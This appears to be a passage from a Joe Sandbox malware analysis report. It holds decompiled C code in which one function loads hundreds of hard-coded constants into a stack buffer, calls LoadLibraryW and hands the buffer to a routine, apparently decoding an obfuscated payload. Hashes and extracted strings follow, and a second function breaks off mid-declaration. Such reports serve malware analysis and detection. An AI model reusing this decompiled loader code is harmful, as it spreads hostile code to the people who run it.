                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
                  				intOrPtr _v404;
                  				intOrPtr _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				intOrPtr _v436;
                  				intOrPtr _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				intOrPtr _v468;
                  				intOrPtr _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				intOrPtr _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				intOrPtr _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				intOrPtr _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				intOrPtr _v568;
                  				intOrPtr _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				intOrPtr _v604;
                  				intOrPtr _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				intOrPtr _v640;
                  				intOrPtr _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				intOrPtr _v684;
                  				intOrPtr _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				intOrPtr _v704;
                  				intOrPtr _v708;
                  				intOrPtr _v712;
                  				intOrPtr _v716;
                  				intOrPtr _v720;
                  				intOrPtr _v724;
                  				intOrPtr _v728;
                  				intOrPtr _v732;
                  				intOrPtr _v736;
                  				intOrPtr _v740;
                  				intOrPtr _v744;
                  				intOrPtr _v748;
                  				intOrPtr _v752;
                  				intOrPtr _v756;
                  				intOrPtr _v760;
                  				intOrPtr _v764;
                  				intOrPtr _v768;
                  				intOrPtr _v772;
                  				intOrPtr _v776;
                  				intOrPtr _v780;
                  				intOrPtr _v784;
                  				intOrPtr _v788;
                  				intOrPtr _v792;
                  				intOrPtr _v796;
                  				intOrPtr _v800;
                  				intOrPtr _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _v816;
                  				intOrPtr _v820;
                  				intOrPtr _v824;
                  				intOrPtr _v828;
                  				intOrPtr _v832;
                  				intOrPtr _v836;
                  				intOrPtr _v840;
                  				intOrPtr _v844;
                  				intOrPtr _v848;
                  				intOrPtr _v852;
                  				intOrPtr _v856;
                  				intOrPtr _v860;
                  				intOrPtr _v864;
                  				intOrPtr _v868;
                  				intOrPtr _v872;
                  				intOrPtr _v876;
                  				intOrPtr _v880;
                  				intOrPtr _v884;
                  				intOrPtr _v888;
                  				intOrPtr _v892;
                  				intOrPtr _v896;
                  				intOrPtr _v900;
                  				intOrPtr _v904;
                  				intOrPtr _v908;
                  				intOrPtr _v912;
                  				intOrPtr _v916;
                  				intOrPtr _v920;
                  				intOrPtr _v924;
                  				intOrPtr _v928;
                  				intOrPtr _v932;
                  				intOrPtr _v936;
                  				intOrPtr _v940;
                  				intOrPtr _v944;
                  				intOrPtr _v948;
                  				intOrPtr _v952;
                  				intOrPtr _v956;
                  				intOrPtr _v960;
                  				intOrPtr _v964;
                  				intOrPtr _v968;
                  				intOrPtr _v972;
                  				intOrPtr _v976;
                  				intOrPtr _v980;
                  				intOrPtr _v984;
                  				intOrPtr _v988;
                  				intOrPtr _v992;
                  				intOrPtr _v996;
                  				intOrPtr _v1000;
                  				intOrPtr _v1004;
                  				intOrPtr _v1008;
                  				intOrPtr _v1012;
                  				intOrPtr _v1016;
                  				intOrPtr _v1020;
                  				intOrPtr _v1024;
                  				intOrPtr _v1028;
                  				intOrPtr _v1032;
                  				intOrPtr _v1036;
                  				intOrPtr _v1040;
                  				intOrPtr _v1044;
                  				intOrPtr _v1048;
                  				intOrPtr _v1052;
                  				intOrPtr _v1056;
                  				intOrPtr _v1060;
                  				intOrPtr _v1064;
                  				intOrPtr _v1068;
                  				intOrPtr _v1072;
                  				intOrPtr _v1076;
                  				intOrPtr _v1080;
                  				intOrPtr _v1084;
                  				intOrPtr _v1088;
                  				intOrPtr _v1092;
                  				intOrPtr _v1096;
                  				intOrPtr _v1100;
                  				intOrPtr _v1104;
                  				intOrPtr _v1108;
                  				intOrPtr _v1112;
                  				intOrPtr _v1116;
                  				intOrPtr _v1120;
                  				intOrPtr _v1124;
                  				intOrPtr _v1128;
                  				intOrPtr _v1132;
                  				intOrPtr _v1136;
                  				intOrPtr _v1140;
                  				intOrPtr _v1144;
                  				intOrPtr _v1148;
                  				intOrPtr _v1152;
                  				intOrPtr _v1156;
                  				intOrPtr _v1160;
                  				intOrPtr _v1164;
                  				intOrPtr _v1168;
                  				intOrPtr _v1172;
                  				intOrPtr _v1176;
                  				intOrPtr _v1180;
                  				intOrPtr _v1184;
                  				intOrPtr _v1188;
                  				intOrPtr _v1192;
                  				intOrPtr _v1196;
                  				intOrPtr _v1200;
                  				intOrPtr _v1204;
                  				intOrPtr _v1208;
                  				intOrPtr _v1212;
                  				intOrPtr _v1216;
                  				intOrPtr _v1220;
                  				intOrPtr _v1224;
                  				intOrPtr _v1228;
                  				intOrPtr _v1232;
                  				intOrPtr _v1236;
                  				intOrPtr _v1240;
                  				intOrPtr _v1244;
                  				intOrPtr _v1248;
                  				intOrPtr _v1252;
                  				intOrPtr _v1256;
                  				intOrPtr _v1260;
                  				intOrPtr _v1264;
                  				intOrPtr _v1268;
                  				intOrPtr _v1272;
                  				intOrPtr _v1276;
                  				intOrPtr _v1280;
                  				intOrPtr _v1284;
                  				intOrPtr _v1288;
                  				intOrPtr _v1292;
                  				intOrPtr _v1296;
                  				intOrPtr _v1300;
                  				intOrPtr _v1304;
                  				intOrPtr _v1308;
                  				intOrPtr _v1312;
                  				intOrPtr _v1316;
                  				intOrPtr _v1320;
                  				intOrPtr _v1324;
                  				intOrPtr _v1328;
                  				intOrPtr _v1332;
                  				intOrPtr _v1336;
                  				intOrPtr _v1340;
                  				intOrPtr _v1344;
                  				intOrPtr _v1348;
                  				intOrPtr _v1352;
                  				intOrPtr _v1356;
                  				intOrPtr _v1360;
                  				intOrPtr _v1364;
                  				intOrPtr _v1368;
                  				intOrPtr _v1372;
                  				intOrPtr _v1376;
                  				intOrPtr _v1380;
                  				intOrPtr _v1384;
                  				intOrPtr _v1388;
                  				intOrPtr _v1392;
                  				intOrPtr _v1396;
                  				intOrPtr _v1400;
                  				intOrPtr _v1404;
                  				intOrPtr _v1408;
                  				intOrPtr _v1412;
                  				intOrPtr _v1416;
                  				intOrPtr _v1420;
                  				intOrPtr _v1424;
                  				intOrPtr _v1428;
                  				intOrPtr _v1432;
                  				intOrPtr _v1436;
                  				intOrPtr _v1440;
                  				intOrPtr _v1444;
                  				intOrPtr _v1448;
                  				intOrPtr _v1452;
                  				intOrPtr _v1456;
                  				intOrPtr _v1460;
                  				intOrPtr _v1464;
                  				intOrPtr _v1468;
                  				intOrPtr _v1472;
                  				intOrPtr _v1476;
                  				intOrPtr _v1480;
                  				intOrPtr _v1484;
                  				intOrPtr _v1488;
                  				intOrPtr _v1492;
                  				intOrPtr _v1496;
                  				intOrPtr _v1500;
                  				intOrPtr _v1504;
                  				intOrPtr _v1508;
                  				intOrPtr _v1512;
                  				intOrPtr _v1516;
                  				intOrPtr _v1520;
                  				intOrPtr _v1524;
                  				intOrPtr _v1528;
                  				intOrPtr _v1532;
                  				intOrPtr _v1536;
                  				intOrPtr _v1540;
                  				intOrPtr _v1544;
                  				intOrPtr _v1548;
                  				intOrPtr _v1552;
                  				intOrPtr _v1556;
                  				char _v1560;
                  
                  				_v1560 = 0x4befb69c;
                  				_v1556 = 0xe2a7d93;
                  				_v1552 = 0xec58315b;
                  				_v1548 = 0xf479b9e5;
                  				_v1544 = 0x3655e0b3;
                  				_v1540 = 0x1788529f;
                  				_v1536 = 0xf8a87d29;
                  				_v1532 = 0x6a1c103e;
                  				_v1528 = 0xa3a4c637;
                  				_v1524 = 0xdd4d869a;
                  				_v1520 = 0xda58f7da;
                  				_v1516 = 0xa4aa4a18;
                  				_v1512 = 0xf64937e7;
                  				_v1508 = 0xa4ae6a93;
                  				_v1504 = 0x4a93dd70;
                  				_v1500 = 0x15b491d3;
                  				_v1496 = 0xb70e4dcf;
                  				_v1492 = 0xfb7fcaa2;
                  				_v1488 = 0x5ce8c08f;
                  				_v1484 = 0x83c7a18c;
                  				_v1480 = 0x6c649979;
                  				_v1476 = 0x8a267553;
                  				_v1472 = 0x14352803;
                  				_v1468 = 0xf6f6795d;
                  				_v1464 = 0xcc94b246;
                  				_v1460 = 0xbe9f1468;
                  				_v1456 = 0x3ef68f3a;
                  				_v1452 = 0x8360e0ee;
                  				_v1448 = 0xdd8b73c8;
                  				_v1444 = 0xfc9700e;
                  				_v1440 = 0x718d1c8;
                  				_v1436 = 0xffb7254;
                  				_v1432 = 0x286ed90a;
                  				_v1428 = 0x1b23db2c;
                  				_v1424 = 0xda2233ed;
                  				_v1420 = 0xbc53fd27;
                  				_v1416 = 0xde98ddd2;
                  				_v1412 = 0xb4314b61;
                  				_v1408 = 0xea162a4;
                  				_v1404 = 0xc02a9ba2;
                  				_v1400 = 0x967ce52;
                  				_v1396 = 0xabfbe251;
                  				_v1392 = 0x175cb512;
                  				_v1388 = 0xf8447fac;
                  				_v1384 = 0x2eac2eac;
                  				_v1380 = 0xf4344c6a;
                  				_v1376 = 0xbbdcaee3;
                  				_v1372 = 0xe99636da;
                  				_v1368 = 0x13a7e5e1;
                  				_v1364 = 0xff3c9bed;
                  				_v1360 = 0x8dbfbd40;
                  				_v1356 = 0xb185ff34;
                  				_v1352 = 0xcace94c2;
                  				_v1348 = 0xc80d6527;
                  				_v1344 = 0xa606e2ad;
                  				_v1340 = 0x6ae37e45;
                  				_v1336 = 0x282fa05a;
                  				_v1332 = 0x88a6d551;
                  				_v1328 = 0x1ff98e41;
                  				_v1324 = 0x5afaf771;
                  				_v1320 = 0xebf0ac61;
                  				_v1316 = 0x51130de3;
                  				_v1312 = 0xa1336917;
                  				_v1308 = 0x7a2f88ee;
                  				_v1304 = 0x718b7c64;
                  				_v1300 = 0xf2ab104c;
                  				_v1296 = 0xb1a7a998;
                  				_v1292 = 0x268c77d7;
                  				_v1288 = 0x9a6fd234;
                  				_v1284 = 0x60166448;
                  				_v1280 = 0xe602cf3d;
                  				_v1276 = 0x71c5ac19;
                  				_v1272 = 0xd33a43b2;
                  				_v1268 = 0x27eb747f;
                  				_v1264 = 0x1470ea9a;
                  				_v1260 = 0xa144ffe1;
                  				_v1256 = 0xd6d9720b;
                  				_v1252 = 0x9286eb36;
                  				_v1248 = 0x2aefe3bd;
                  				_v1244 = 0xed564a2f;
                  				_v1240 = 0xa9426475;
                  				_v1236 = 0x2bf8a593;
                  				_v1232 = 0xd0a447e5;
                  				_v1228 = 0x48052515;
                  				_v1224 = 0x3e8ebb64;
                  				_v1220 = 0xfe618b29;
                  				_v1216 = 0x751b8d9a;
                  				_v1212 = 0xd44d92f4;
                  				_v1208 = 0x5d775a9c;
                  				_v1204 = 0x62856083;
                  				_v1200 = 0xf5056c81;
                  				_v1196 = 0x29043594;
                  				_v1192 = 0x4ba08155;
                  				_v1188 = 0x2b9a15db;
                  				_v1184 = 0x15929201;
                  				_v1180 = 0x3631bff8;
                  				_v1176 = 0x959afeae;
                  				_v1172 = 0x1b996608;
                  				_v1168 = 0x9f6b0905;
                  				_v1164 = 0x6541544e;
                  				_v1160 = 0x3b4276c2;
                  				_v1156 = 0x449b5732;
                  				_v1152 = 0xeeda9290;
                  				_v1148 = 0xdcaa8116;
                  				_v1144 = 0xa1baec1f;
                  				_v1140 = 0x1470c0f3;
                  				_v1136 = 0x3e6a5a1a;
                  				_v1132 = 0x3833bb5d;
                  				_v1128 = 0xdb45c3d4;
                  				_v1124 = 0x27574c46;
                  				_v1120 = 0xa80b0835;
                  				_v1116 = 0xfcd6c910;
                  				_v1112 = 0xe990762e;
                  				_v1108 = 0xe0d8e335;
                  				_v1104 = 0x34abe755;
                  				_v1100 = 0x56597a74;
                  				_v1096 = 0xb103ce43;
                  				_v1092 = 0xef319e25;
                  				_v1088 = 0x22a91b8d;
                  				_v1084 = 0xf82edbd2;
                  				_v1080 = 0x3b4b8d37;
                  				_v1076 = 0x338cfe68;
                  				_v1072 = 0xf29573ff;
                  				_v1068 = 0x563e81d6;
                  				_v1064 = 0x548c86c1;
                  				_v1060 = 0x4468b232;
                  				_v1056 = 0xede258c9;
                  				_v1052 = 0x7c8c7e70;
                  				_v1048 = 0xd17a549a;
                  				_v1044 = 0xaf47054c;
                  				_v1040 = 0x8e7aa5fb;
                  				_v1036 = 0xda162cad;
                  				_v1032 = 0x7f4adfe2;
                  				_v1028 = 0xb42a2fff;
                  				_v1024 = 0x7179f28c;
                  				_v1020 = 0xcf51a6c7;
                  				_v1016 = 0xb6332844;
                  				_v1012 = 0xfdcdaa4c;
                  				_v1008 = 0xb14c459d;
                  				_v1004 = 0x7564d49e;
                  				_v1000 = 0x8f70fe3c;
                  				_v996 = 0xdc36cd7d;
                  				_v992 = 0x63e63e71;
                  				_v988 = 0x5edb739d;
                  				_v984 = 0x1cd504ef;
                  				_v980 = 0x93b57070;
                  				_v976 = 0x28a54980;
                  				_v972 = 0x64ef1114;
                  				_v968 = 0xed02e6be;
                  				_v964 = 0xabe7464c;
                  				_v960 = 0xe34a9f4f;
                  				_v956 = 0x38e0f1e6;
                  				_v952 = 0xec04582b;
                  				_v948 = 0x61693d0f;
                  				_v944 = 0xe21a0b35;
                  				_v940 = 0xc48c0b6a;
                  				_v936 = 0xfc0bfcd2;
                  				_v932 = 0xe781bd04;
                  				_v928 = 0x148c9f07;
                  				_v924 = 0x29cccea2;
                  				_v920 = 0xae046087;
                  				_v916 = 0x170e2607;
                  				_v912 = 0xfb9e28d9;
                  				_v908 = 0xc5f3c745;
                  				_v904 = 0x2064696d;
                  				_v900 = 0xfffefc0b;
                  				_v896 = 0xf75d58e6;
                  				_v892 = 0xdd0c0350;
                  				_v888 = 0xee345fd5;
                  				_v884 = 0x15c0bc71;
                  				_v880 = 0xfc21594b;
                  				_v876 = 0xf7d17b82;
                  				_v872 = 0xc53fb9bc;
                  				_v868 = 0x3db78dd2;
                  				_v864 = 0x5aa3eff4;
                  				_v860 = 0x4ffb8986;
                  				_v856 = 0x679dc3d7;
                  				_v852 = 0xf57679b7;
                  				_v848 = 0xd4a33e35;
                  				_v844 = 0x17525c45;
                  				_v840 = 0x2f705952;
                  				_v836 = 0x4709a022;
                  				_v832 = 0xe1344555;
                  				_v828 = 0xd80a835f;
                  				_v824 = 0x615f5253;
                  				_v820 = 0x5433de81;
                  				_v816 = 0x54f130f8;
                  				_v812 = 0x4823fa93;
                  				_v808 = 0xb927d63b;
                  				_v804 = 0xa075442;
                  				_v800 = 0xf027a5bf;
                  				_v796 = 0x1ff6d87a;
                  				_v792 = 0x717d95e8;
                  				_v788 = 0xc7adf187;
                  				_v784 = 0x41178485;
                  				_v780 = 0xd28e7ea8;
                  				_v776 = 0xd30c5935;
                  				_v772 = 0x323cce37;
                  				_v768 = 0x3b66b84b;
                  				_v764 = 0x93a4a480;
                  				_v760 = 0xc6f91e4c;
                  				_v756 = 0x878d3e1c;
                  				_v752 = 0xacbe73e0;
                  				_v748 = 0x39411ffd;
                  				_v744 = 0x51956353;
                  				_v740 = 0xeae86d79;
                  				_v736 = 0x74761c39;
                  				_v732 = 0x61d7b190;
                  				_v728 = 0xa072a497;
                  				_v724 = 0x958dee7a;
                  				_v720 = 0x9e671c60;
                  				_v716 = 0xd2430678;
                  				_v712 = 0x94c08196;
                  				_v708 = 0x965ab2f9;
                  				_v704 = 0x29b1888a;
                  				_v700 = 0x32e7db29;
                  				_v696 = 0xc7764655;
                  				_v692 = 0x6f1caa55;
                  				_v688 = 0x9eb0d2f;
                  				_v684 = 0x880161c9;
                  				_v680 = 0xa1c00ce3;
                  				_v676 = 0xc1d28a66;
                  				_v672 = 0xcc72ca45;
                  				_v668 = 0x97b55c25;
                  				_v664 = 0x8558f7e3;
                  				_v660 = 0x8ac5a732;
                  				_v656 = 0x6245af98;
                  				_v652 = 0xabcc6957;
                  				_v648 = 0x7e544f4d;
                  				_v644 = 0x43da5efa;
                  				_v640 = 0x781609ef;
                  				_v636 = 0x4617ba68;
                  				_v632 = 0xdfef7616;
                  				_v628 = 0x999614b7;
                  				_v624 = 0xb1861e95;
                  				_v620 = 0xe7f3ecef;
                  				_v616 = 0x74d5be3b;
                  				_v612 = 0x3fc5e28;
                  				_v608 = 0x1dd16ad;
                  				_v604 = 0x1052e4f9;
                  				_v600 = 0x65c2038a;
                  				_v596 = 0xd0c421c0;
                  				_v592 = 0xbc4682ff;
                  				_v588 = 0x32e7b9aa;
                  				_v584 = 0xd10fbd07;
                  				_v580 = 0xedbcb66b;
                  				_v576 = 0x2000143;
                  				_v572 = 0xcb14edfd;
                  				_v568 = 0xcf05854d;
                  				_v564 = 0xa88f0fe2;
                  				_v560 = 0xb803256e;
                  				_v556 = 0xb644a825;
                  				_v552 = 0xeeba0c9d;
                  				_v548 = 0x388db315;
                  				_v544 = 0x76b2629a;
                  				_v540 = 0xf626cd97;
                  				_v536 = 0x5ffbfc65;
                  				_v532 = 0x63532dab;
                  				_v528 = 0xc99a8036;
                  				_v524 = 0x3db019be;
                  				_v520 = 0xb8a25e3b;
                  				_v516 = 0x27c55253;
                  				_v512 = 0x64213913;
                  				_v508 = 0x1fc02174;
                  				_v504 = 0x74194bd1;
                  				_v500 = 0xc2830dba;
                  				_v496 = 0x59201bb3;
                  				_v492 = 0xf0a50b26;
                  				_v488 = 0x30a58ab3;
                  				_v484 = 0xe5059002;
                  				_v480 = 0xf326a3d3;
                  				_v476 = 0x98f99278;
                  				_v472 = 0xe9d966bc;
                  				_v468 = 0xab4cde5d;
                  				_v464 = 0x808fb1a1;
                  				_v460 = 0xd56d9e3e;
                  				_v456 = 0x4fc3d42f;
                  				_v452 = 0xe97c9080;
                  				_v448 = 0x5fec54a8;
                  				_v444 = 0x554cc6e2;
                  				_v440 = 0x7ae3fc51;
                  				_v436 = 0x3db9e987;
                  				_v432 = 0x270657d8;
                  				_v428 = 0x91df6386;
                  				_v424 = 0xa06420f6;
                  				_v420 = 0xb645fca2;
                  				_v416 = 0x9c6867fb;
                  				_v412 = 0x519fe36b;
                  				_v408 = 0xb7531c61;
                  				_v404 = 0xf5fc84f3;
                  				_v400 = 0x26cd3d1f;
                  				_v396 = 0x472b53f7;
                  				_v392 = 0xf96b6641;
                  				_v388 = 0xabeb68fc;
                  				_v384 = 0xeff2f92;
                  				_v380 = 0x12bd2dda;
                  				_v376 = 0xad0b7b64;
                  				_v372 = 0x1ba50940;
                  				_v368 = 0xd9508423;
                  				_v364 = 0x5b6a112d;
                  				_v360 = 0x4c072a9e;
                  				_v356 = 0xcd632d88;
                  				_v352 = 0x86676816;
                  				_v348 = 0x11d5ce75;
                  				_v344 = 0x4d839846;
                  				_v340 = 0x61a20281;
                  				_v336 = 0x7d4b08cc;
                  				_v332 = 0xe75e3c98;
                  				_v328 = 0xa09673de;
                  				_v324 = 0x4fcdca3;
                  				_v320 = 0x87caecd;
                  				_v316 = 0x8bb0de23;
                  				_v312 = 0x8bb4e855;
                  				_v308 = 0xd5e4f17c;
                  				_v304 = 0x6ce7b55c;
                  				_v300 = 0x2917ee1f;
                  				_v296 = 0xb765a1eb;
                  				_v292 = 0x17313737;
                  				_v288 = 0x491b73e5;
                  				_v284 = 0x60893bf9;
                  				_v280 = 0x8ed66181;
                  				_v276 = 0xd3c82709;
                  				_v272 = 0x74742dcc;
                  				_v268 = 0xb70f62bb;
                  				_v264 = 0x46e9044d;
                  				_v260 = 0xddfb36c2;
                  				_v256 = 0x1c14621e;
                  				_v252 = 0x3bba477e;
                  				_v248 = 0x1f5f3936;
                  				_v244 = 0xb8113197;
                  				_v240 = 0x1a909f95;
                  				_v236 = 0x2ff6f937;
                  				_v232 = 0x906b0598;
                  				_v228 = 0xeb5ff201;
                  				_v224 = 0x6f534f00;
                  				_v220 = 0x396a258d;
                  				_v216 = 0xdc74f9cd;
                  				_v212 = 0x9606240;
                  				_v208 = 0xeece9328;
                  				_v204 = 0x98343d05;
                  				_v200 = 0x46089577;
                  				_v196 = 0x8ca5a500;
                  				_v192 = 0x5fa8daa2;
                  				_v188 = 0xfebc41a3;
                  				_v184 = 0x4f16be69;
                  				_v180 = 0x5fcd3ff2;
                  				_v176 = 0x290cab8a;
                  				_v172 = 0x9084f10f;
                  				_v168 = 0x21f4372d;
                  				_v164 = 0xf77c0e4f;
                  				_v160 = 0xee8b3883;
                  				_v156 = 0x9d87c954;
                  				_v152 = 0xb5dc9ad1;
                  				_v148 = 0x31d7efed;
                  				_v144 = 0x23271e7d;
                  				_v140 = 0x2030c0b1;
                  				_v136 = 0x89cc42fd;
                  				_v132 = 0x855c1fdb;
                  				_v128 = 0x4586f4e2;
                  				_v124 = 0x6c1867c5;
                  				_v120 = 0x2b50d8a6;
                  				_v116 = 0xd392eb31;
                  				_v112 = 0x5adcea22;
                  				_v108 = 0xb0c01b07;
                  				_v104 = 0xfc9581f8;
                  				_v100 = 0x8a3c0db7;
                  				_v96 = 0xf184c207;
                  				_v92 = 0xf7612506;
                  				_v88 = 0xc77cedd3;
                  				_v84 = 0x456eed47;
                  				_v80 = 0x4d7c6473;
                  				_v76 = 0xf66fe5bc;
                  				_v72 = 0x3b81c48e;
                  				_v68 = 0x4ca88e47;
                  				_v64 = 0xf1f7108e;
                  				_v60 = 0xb6ad32aa;
                  				_v56 = 0xa746cf25;
                  				_v52 = 0x76783488;
                  				_v48 = 0x8a52240d;
                  				_v44 = 0xf4ff14a7;
                  				_v40 = 0xf0d384e;
                  				_v36 = 0x88b9944;
                  				_v32 = 0x8289fea5;
                  				_v28 = 0xf70587d8;
                  				_v24 = 0xecf5125b;
                  				_v20 = 0x4b2bcabe;
                  				_v16 = 0x645459e0;
                  				_v12 = 0x8f09d154;
                  				_v8 = 0x7a530fa7;
                  				_t400 = E00401A52(0x412980, 0x72fc3a35);
                  				 *0x4164f4 = LoadLibraryW(_t391);
                  				L00401B09(_t400);
                  				_push(0x414e70);
                  				_push(0x4fb37d17);
                  				return E004012FF( *0x4164f4,  &_v1560, 0x185);
                  			}

                  0x00409b83
                  0x00409b8a
                  0x00409b91
                  0x00409b98
                  0x00409b9f
                  0x00409ba6
                  0x00409bad
                  0x00409bb4
                  0x00409bc0
                  0x00409bcb
                  0x00409bd0
                  0x00409be1
                  0x00409be6
                  0x00409bfc

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 00409BC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: /$/JV$@b`$E~j$FLW'$GnE$MOT~$NTAe$RYp/$SR_a$UE4$[1X$mid $q>c$sd|M$tzYV$ym$YTd
                  • API String ID: 1029625771-3197268478
                  • Opcode ID: 964287715a5c159c8613d9b1a8f68429259ed4a0fe6ae7de7cc1a883e1cc3d30
                  • Instruction ID: a2473892be70d7853f5d3ab73c35abe6bfda1bb905b43dc05c267480b0676288
                  • Opcode Fuzzy Hash: 964287715a5c159c8613d9b1a8f68429259ed4a0fe6ae7de7cc1a883e1cc3d30
                  • Instruction Fuzzy Hash: 176295F48467698BDB61DF429E847CEBA75BB51345F6096C8C29C3B214CB710B82CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 83%
                  			E0040B6B5(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
